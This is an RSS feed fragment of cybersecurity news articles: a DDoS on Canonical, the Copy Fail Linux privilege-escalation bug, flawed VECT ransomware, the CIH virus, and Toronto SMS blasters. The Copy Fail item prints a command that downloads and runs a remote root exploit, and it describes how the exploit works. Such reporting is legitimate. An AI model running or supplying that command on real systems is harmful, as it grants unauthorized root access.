                                <p>The meatspace war with Iran has been spilling into cyberspace as well, and the latest casualty is Canonical. The company behind the ever-popular Ubuntu Linux is in a spot of bother, as the majority of its infrastructure<a href="https://x.com/VECERTRadar/status/2049934376272810445"> <u>is being hit</u></a> by a Distributed Denial of Service (DDoS) attack. The attack has reportedly been claimed by Iranian ne'er-do-wells 313 Team, also known as the Islamic Cyber Resistance in Iraq. The attackers requested a virtual meeting with the Canonical staff under threat of continued attacks, but there have been no other public developments.</p><p>The most obvious result is that Canonical's, er, canonical Ubuntu download and update mirrors worldwide are sluggish or down entirely, as is the main website. The attack extends to Launchpad, the Snap store, Canonical SSO, and other related services. Thankfully, there are no reports of security compromises affecting package repositories or ISO images, so whichever download spot you find should be safe.</p><p>Intentionally or not, this attack comes hot on the heels of the release of Ubuntu 26 LTS, dubbed Resolute Raccoon. As its name and even version number imply, this is a release with an extended support window, meaning it'll be the one installed in servers and workstations worldwide.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: AI shortages</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="z53fPgXjpKHTpeGv3RHpqj" name="NVIDIA GB200 NVL72 Compute Tray Press Graphic.png" caption="" alt="Nvidia" src="https://cdn.mos.cms.futurecdn.net/z53fPgXjpKHTpeGv3RHpqj.png" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Nvidia)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/storage/perfect-storm-of-demand-and-supply-driving-up-storage-costs?utm_source=edit-links&utm_medium=boxout&utm_term=ai-shortage" target="_blank">AI data centers are swallowing the world's memory and storage supply</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/chip-scarcity-assaults-auto-industry-amid-the-worsening-nexperia-and-dram-crisis?utm_source=edit-links&utm_medium=boxout&utm_term=ai-shortage" target="_blank">Chip scarcity assaults auto industry amid the worsening Nexperia and DRAM crisis</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/samsung-and-sk-hynix-shorten-memory-contracts-as-pricing-power-shifts-back-to-suppliers?utm_source=edit-links&utm_medium=boxout&utm_term=ai-shortage" target="_blank">Samsung and SK hynix shorten memory contracts as pricing power shifts back to suppliers</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/memory-makers-are-set-to-earn-usd551-billion-from-the-ai-boom-twice-as-much-as-contract-chip-manufacturers-forecasts-suggest-that-2026-revenue-will-skyrocket-thanks-to-data-center-demand?utm_source=edit-links&utm_medium=boxout&utm_term=ai-shortage">Memory makers are set to earn $551 billion from the AI boom</a></li></ul></p></div></div><p>Much like yours truly found out yesterday, you may find it difficult to get a hold of Ubuntu 26, package updates, or even the handy WSL2 image. The Linux community is large and spread out, though, so any one of the hundreds of the non-Canonical (pun intended) will suffice. You can find one of the mirrors in the<a href="https://launchpad.net/ubuntu/+archivemirrors"> <u>list at launchpad.net</u></a>; if that link fails to load, you can consult the version<a href="http://web.archive.org/web/20260425125013/https://launchpad.net/ubuntu/+archivemirrors"> <u>on the Wayback Machine</u></a> here. If you have a torrent client handy, here are the links to the<a href="https://releases.ubuntu.com/resolute/ubuntu-26.04-desktop-amd64.iso.torrent"> <u>desktop x64 release</u></a> and the<a href="https://releases.ubuntu.com/resolute/ubuntu-26.04-live-server-amd64.iso.torrent"> <u>live server x64 version</u></a>.</p><p>Some techies hypothesized that this attack could be related to the disastrous<a href="https://www.tomshardware.com/tech-industry/cyber-security/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users"> <u>Copy Fail vulnerability</u></a>, to which most distros, including the extant Ubuntu 24, are vulnerable. That premise is a little shaky, as in the grand scheme of things, just stopping people from updating Ubuntu isn't a world-ender, plus power users and competent sysadmins will apply a workaround or just find a mirror regardless.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Linux exploit instantly grants administrator access on most distributions since 2017 — cryptography optimization snafu grants root privileges to local users ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/linux-exploit-instantly-grants-administrator-access-on-most-distributions-since-2017-cryptography-optimization-snafu-grants-root-privileges-to-local-users</link>
                                                                            <description>
                            <![CDATA[ Zero-day exploit instantly grants administrator access on most Linux distributions since 2017 ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">5CQ9MXx7ETv3EjErv2iZbG</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/iMxEdJKjjPfdmwRbtJFnhh-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 01 May 2026 10:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/iMxEdJKjjPfdmwRbtJFnhh-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Security vulnerability]]></media:description>                                                            <media:text><![CDATA[Security vulnerability]]></media:text>
                                <media:title type="plain"><![CDATA[Security vulnerability]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/iMxEdJKjjPfdmwRbtJFnhh-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>It is quite an interesting patch week for Linux systems administrators out there. Researchers at Xint Code <a href="https://copy.fail/" target="_blank">have discovered</a> a nasty exploit that instantly grants root access to any local unprivileged user, a nightmare scenario for multi-user servers of various types, including web servers, container environments like Kubernetes, CI/CD pipelines, and more.</p><p>The CVE-2026-31431 exploit affects pretty much every Linux distro currently in use and has existed since 2017. Although it's not a zero-day and the kernel has <a href="https://github.com/torvalds/linux/commit/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5" target="_blank">already gotten a patch</a>, the short disclosure window gave distro makers relatively little time to react. Affected variants include (but aren't limited to) Ubuntu 24 (version 26 was just released last week), RHEL 10, Suse 16, and Amazon Linux 2023. Even Windows' WSL2 is affected, and all it takes is 732 bytes to do it.</p><p>To check that a system is vulnerable, you can just run "curl <a href="https://copy.fail/exp">https://copy.fail/exp</a> | python3 && su" with a standard unprivileged account — though we should note that you're trusting an online script. The source code for the proof-of-concept is <a href="https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py">available here</a> if you prefer. If your distro doesn't have a patch available yet, you can try one of two mitigation methods.</p><p>If your kernel loads algif_aaed as a module, a simple [ echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf ] will suffice. Some distributions, however, compile that functionality right into the kernel core, including RHEL and WSL2. That means that in those instances, you'll have to resort to disallowing users from opening AF_ALG sockets to begin with, via seccomp profiles, AppArmor, or SELinux.</p><p>Although the Xint Code security team didn't provide a rationale for publicly disclosing the vulnerability so early, they did mention that they found it with the help of an AI assistant. Given that the source code for the Linux kernel is by definition public, in theory, any serious attacker would find it just as easily. Perhaps the fast reveal was an unfortunate necessity.</p><p>As for the exploit mechanism itself, it's fairly devious. AF_ALG is a socket that an application can use to have data encrypted or decrypted by providing it with the data to be and a tag. To perform the attack, you provide a splice of an executable you have access to as the tag; the most obvious one being "su".</p><p>The "algif_aead" kernel function, crucially, has an internal optimization that doesn't make a copy of the data to encrypt and copy back; rather, <em> it </em>chains the tag data directly onto the output buffer by reference instead of copying it. As a coincidence, the "authencesn" encryption algorithm involves writing 4 bytes at a fixed offset in its output buffer. Since the tag you spliced — the page data for "su" — is now part of that output, those bytes will get written directly into the kernel's cached copy of the executable.</p><p>When you call the executable, it'll be joyfully corrupted, granting administrator access. This all happens in memory, too, so there are no detectable disk writes, and the exploit will also get past many security suites.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Ransomware accidentally destroys all files larger than 128KB, preventing decryption — VECT code likely partly vibe coded with AI or used an old code base, security researchers suggest ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/ransomware-accidentally-destroys-all-files-larger-than-128kb-preventing-decryption-vect-code-likely-partly-vibe-coded-with-ai-or-used-an-old-code-base-security-researchers-suggest</link>
                                                                            <description>
                            <![CDATA[ A ransomware's major flaw meant that files cannot be decrypted because of a programming mistake. It also has several minor issues, showing that its creator may not be as sophisticated as suggested. Still, researchers point out that these can be rectified in future versions of the malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Jn4Gbgu5mFDvbjP4FbeDgD</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/FRKea6agfJsYdo9T4XMVBT-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 29 Apr 2026 10:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/FRKea6agfJsYdo9T4XMVBT-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A man receiving a ransomware attack on both his phone and laptop - a poor day for the stock image actor.]]></media:description>                                                            <media:text><![CDATA[A man receiving a ransomware attack on both his phone and laptop - a poor day for the stock image actor.]]></media:text>
                                <media:title type="plain"><![CDATA[A man receiving a ransomware attack on both his phone and laptop - a poor day for the stock image actor.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/FRKea6agfJsYdo9T4XMVBT-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>VECT, a ransomware-as-a-service (RaaS) that first started circulating online in December 2025, was discovered to host a major bug in its programming. According to <a href="https://research.checkpoint.com/2026/vect-ransomware-by-design-wiper-by-accident/"><em>Check Point Research (CPR)</em></a>, the ransomware accidentally turned into a wiper after the program unintentionally discarded some nonces needed to decrypt files larger than 128KB. This means that even if a victim were to pay the attackers to unlock their data, no one can undo the damage because the code needed to break the encryption no longer exists. Numerous other problems plague the code, and CPR thinks the code was likely vibe coded using AI.</p><p>The ransomware would automatically break apart any file greater than 128KB into four different chunks and then encrypt each one with a random 12-byte nonce written on a single shared output buffer. Unfortunately for the victim, the four nonces share the same buffer address, meaning each new nonce overwrites the older one. So, once the process is complete, only the latest nonce (or the last of the four chunks) is preserved and appended to the file. That means even if the attacker provides the victim with the key to decrypt their data, the fact that only the last nonce of each file greater than 128KB is still attached means that the key will not work.</p><p>This isn’t the only flaw that the researchers uncovered with the ransomware — they also saw issues with how the program uses CPU threads, string obfuscation routines that cancel each other out, and misidentified ciphers on its own public reports. VECT operators can pick between three fast, medium, and secure encryption methods, and while the choice is parsed into code, it is never implemented. Another uncommon characteristic of the malware is that it includes Ukraine as a Commonwealth of Independent States (CIS) member, which most have removed from their lists after Russia invaded Ukraine in 2022. </p><p>The malware is being presented as a sophisticated tool, with the group behind it appearing as sophisticated hackers. After all, it has multi-platform capabilities capable of attacking Windows, Linux, and even ESXi virtual machines, has partnered with other threat actors like TeamPCP, and has even built its own affiliate network through BreachForums. But because of the major issues affecting VECT,<em> CPR</em> theorized that the organization behind it either used AI tools to generate some of its code or that it relied on an older code base as the starting point for its ransomware.</p><p>This isn’t the first time that a major ransomware group has made a mistake in its programming. Just earlier this year, <a href="https://www.tomshardware.com/tech-industry/cyber-security/nitrogen-ransomware-programmers-lock-themselves-out-of-a-payment-key-management-bug-encrypts-victims-data-forever">Nitrogen ransomware made a mistake</a> that overwrote part of the encryption public keys with zeros. This meant that even if one possesses the private key, the mangled public keys meant that no one could undo the encryption. Reporting suggests that this was probably caused by a common off-by-one issue related to a developer’s fat-finger mistake.</p><p>Still, this does not mean that the community at large should ignore threats like these, even though they seemed to have backfired on their creators. The researchers pointed out that the people behind it have ambition and know what an effective ransomware should look like. It could work on updating VECT to fix the issues that <em>CPR</em> revealed in its report and release a more effective version in the future. More importantly, it already has an existing distribution system, making it easier for the group to infect more systems without starting from scratch.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Chernobyl virus turned 27 today, and it could brick your PC in ways modern malware can't by overwriting BIOS firmware ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/the-chernobyl-virus-turned-27-today-and-it-could-brick-your-pc-in-ways-modern-malware-cant</link>
                                                                            <description>
                            <![CDATA[ 27 years ago today, on April 26, 1999, a 1 KB virus called CIH detonated its payload on hundreds of thousands of Windows 9x machines worldwide. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">zMWCyFRUHXxRF8ym6zoQDH</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/s3xySUYCCzMbDfv5Ju3ze7-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Sun, 26 Apr 2026 13:36:47 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Luke James ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/C4FAi2KzwaGLUrBqzX5aBM.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Luke is a freelance technology journalist who has been covering hardware and semiconductors since 2020. He began his career at All About Circuits and has since contributed to EE Power and Laptop Mag. Luke has a particular interest in semiconductors, microelectronics, and the industry shifts that shape the devices we use every day. Above all, he loves making complex technology accessible to experts and enthusiasts alike. Luke&#039;s interest in hardcore computing can be traced back to his university studies, when he responsibly spent his very first student loan payment on a custom-built gaming rig equipped with a GTX 780 Ti. &lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/s3xySUYCCzMbDfv5Ju3ze7-1280-80.jpg">
                                                            <media:credit><![CDATA[Brochure scanned by Swtpc6800]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Windows 1 brochure scan]]></media:description>                                                            <media:text><![CDATA[Windows 1 brochure scan]]></media:text>
                                <media:title type="plain"><![CDATA[Windows 1 brochure scan]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/s3xySUYCCzMbDfv5Ju3ze7-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>27 years ago today, on April 26, 1999, a 1 KB virus called CIH detonated its payload on hundreds of thousands of Windows 9x machines worldwide, zeroing out hard drives and flashing <a href="https://www.tomshardware.com/pc-components/motherboards/critical-uefi-vulnerabilities-found-in-gigabyte-motherboards-allow-attackers-to-bypass-secure-boot-and-install-firmware-backdoors">junk data to motherboard</a> BIOS chips. </p><p>The virus, written by Taiwanese university student Chen Ing-hau at Tatung University in 1998, is believed to have infected around 60 million computers and caused an estimated $40 million in commercial damage, earning the nickname "Chernobyl" because its April 26 trigger date happened to coincide with the anniversary of the 1986 nuclear disaster.</p><p>Chernobyl was also known as a space filler virus for the way it concealed itself inside executables. Instead of appending code to the end of a file and inflating its size, CIH scanned Windows Portable Executable files for unused gaps between code sections and split its payload across those spaces. Infected files remained the same size, which defeated the file-size checks that many antivirus tools of the era relied on. At roughly 1 KB, the virus was compact enough to distribute itself across a handful of tiny cavities in a single EXE.</p><p>Once running, CIH used an exploit to escalate from processor ring 3 to ring 0, giving it kernel-level access to hook file system calls and silently infect every executable a user opened. It worked only on Windows 95, 98, and ME; Windows NT was immune.</p><p>CIH spread globally through pirated software channels in the summer of 1998, but several infections came from legit commercial sources like IBM’s Aptiva PCs, a batch of which shipped with CIH pre-installed in March 1999, one month before the trigger date. Yamaha also distributed an infected firmware update for its CD-R400 drives, and copies of the tool Back Orifice 2000 handed out at DEF CON 7 in July of the same year also carried the virus. </p><p>When CIH activated, its dual payload first overwrote the initial megabyte of the boot drive with zeros, destroying the partition table and rendering the disk's contents inaccessible. It then attempted to flash garbage data to the motherboard's BIOS chip, which, if successful, left the machine unable to power on at all without a chip replacement. The <a href="https://www.tomshardware.com/news/enterprise-oem-vunerabilities">BIOS attack </a>worked primarily on systems using certain Intel 430TX-based chipsets with unprotected flash memory.</p><p>Despite the scale of the damage, Taiwanese prosecutors couldn’t charge Chen because no victims came forward with a lawsuit, as required under local law at the time, and Chen had claimed he wrote CIH to challenge antivirus vendors who he felt overstated their products' detection capabilities. The incident prompted Taiwan to pass new computer crime legislation.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Mobile SMS blasters in vehicles prowled Canadian streets, causing 13 million network disruptions and infiltrating tens of thousands of devices — blaster blocked 911 calls, stole cellphone data ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/sms-blasters-were-cruising-canadian-streets-stealing-cellphone-data-and-blocking-emergency-911-calls-project-lighthouse-infiltrated-tens-of-thousands-of-devices-and-caused-13-million-network-disruptions</link>
                                                                            <description>
                            <![CDATA[ The authorities say that the three individuals used the SMS blasters to send thousands of smishing messages. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KXoWtETPhY8ZYH7DnryXef</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/buJ5cHLACxcBxRmmFQ8Sga-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Sun, 26 Apr 2026 11:00:00 +0000</pubDate>                                                                                                                                <updated>Sun, 26 Apr 2026 13:10:50 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/buJ5cHLACxcBxRmmFQ8Sga-1280-80.png">
                                                            <media:credit><![CDATA[RDNE Stock Project/Pexels]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[a smishing text message on a phone]]></media:description>                                                            <media:text><![CDATA[a smishing text message on a phone]]></media:text>
                                <media:title type="plain"><![CDATA[a smishing text message on a phone]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/buJ5cHLACxcBxRmmFQ8Sga-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Toronto police arrested three people involved in an SMS blaster scheme, in which the suspects drove around downtown Toronto with the devices running in the backs of their cars. These appliances mimic cell sites, intercept phone signals, and are used to send fraudulent text messages. The Toronto Police Service said in a news conference streamed on <a href="https://www.youtube.com/live/H2JKpTmy5bc">YouTube</a> that this is the first-of-its-kind operation in Canada, and that the threat had ceased once the operation was broken up. Still, the authorities warned that people should remain vigilant, as they can still receive fraudulent texts via traditional channels.</p><p>Canadian investigators discovered that the perpetrators had infiltrated tens of thousands of mobile devices connected to the SMS blaster. It recorded 13 million network disruptions. Affect devices were restricted from accessing legitimate cellular networks and emergency services such as 911.</p><p>An SMS blaster works by impersonating a cellular network base station, with nearby handsets automatically connecting to it because it's closer and offers a stronger signal than legitimate cell towers. The operators can then send texts that impersonate legitimate institutions to all phones connected to their fake cell site. The fake SMS that these machines send out appear to come from official sources, such as showing the name of a bank or local government, rather than a phone number or contact.</p><p>Because the message appears to come from institutions, victims are more likely to trust it and tap the link sent to their phones. From there, the targets are then routed to a website designed to steal their credentials or make them pay fraudulent charges. This is called smishing, and the SMS blaster enables attackers to reach tens of thousands of potential victims directly, without going through official networks. This allows them to bypass protections put in place by telecommunications providers and access the SMS inboxes of people in the vicinity.</p><div class="youtube-video" data-nosnippet ><div class="video-aspect-box"><iframe data-lazy-priority="high" data-lazy-src="https://www.youtube-nocookie.com/embed/H2JKpTmy5bc" allowfullscreen></iframe></div></div><p>“What makes this particularly concerning is the scale and impact,” Toronto Police Deputy Chief Robert Johnson said. “This wasn’t targeting a single individual or business. It had the ability to reach thousands of devices at once. And beyond the financial risk, there are real public safety implications. For instance, when devices are diverted from legitimate networks, even briefly, it interferes with a person’s ability to connect to emergency services.”</p><p>The Canadian authorities did not release a photo of the actual device they captured, though. Detective Sergeant Lindsay Riddell said, “The ones we seized in Toronto were uniquely built, and we’re not sharing those publicly for safety reasons.” While cheap SMS-only blasters are primarily used for mass smishing attempts, a different class of devices that operate similarly can pose a threat to national security. IMSI catchers also intercept phone signals, but instead of just sending out fake texts, they can route phone signals from the legitimate network through them. This could potentially allow them to record voice calls and capture device metadata.</p><p>The police say that this SMS blaster operation was the first one ever recorded in Canada, but other nations have been dealing with these for years now. In fact, Philippine authorities arrested two Chinese nationals in February this year, operating a similar scheme in which hired drivers carried IMSI devices in the back of their vehicles while loitering near key government installations, military bases, and even the U.S. embassy.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ How a cavalcade of blunders gave unauthorized users access to Claude Mythos — restricted model accessed by third parties, thanks to knowledge from data breach ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/how-a-cavalcade-of-blunders-gave-unauthorized-users-access-to-claude-mythos-restricted-model-accessed-by-third-parties-thanks-to-knowledge-from-data-breach</link>
                                                                            <description>
                            <![CDATA[ Unauthorized individuals have accessed Anthropic's new Mythos cybersecurity-focused AI model, despite the developer locking it down to just a handful of companies. Considering the AI was purposefully designed to find zero-day exploits and offer viable fixes, the breach raises questions about Anthropic's own security, and why Mythos couldn't protect it. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qfdji57PWajrXSvRH3FCam</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/oVkvRiLw6nfH6cD4HoJBhF-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 24 Apr 2026 15:12:08 +0000</pubDate>                                                                                                                                <updated>Thu, 14 May 2026 15:58:04 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Jon Martindale ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/YeutDv8zJmhi7xH35MSt8Z.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;After building his first computers in his teens, Jon Martindale has spent the past two decades covering the latest advances in technology. From displays to PC components, blockchain to AI, and tablets to standing desk accessories, Jon has covered just about every facet of the tech space in his varied career. He has bylines at Forbes, USNews, Lifewire, DigitalTrends, PCWorld, and a range of other sites. He brings that same level of expertise and professional insight to Toms Hardware.Away from writing, Jon is an avid reader, board gamer, and fitness enthusiast. He lives in rural Gloucestershire with his wife, two children, and French Bulldog cross.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>true</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/oVkvRiLw6nfH6cD4HoJBhF-1280-80.jpg">
                                                            <media:credit><![CDATA[Samuel Boivin/NurPhoto via Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[NSA logo with Anthropic logo on phone screen.]]></media:description>                                                            <media:text><![CDATA[NSA logo with Anthropic logo on phone screen.]]></media:text>
                                <media:title type="plain"><![CDATA[NSA logo with Anthropic logo on phone screen.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/oVkvRiLw6nfH6cD4HoJBhF-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
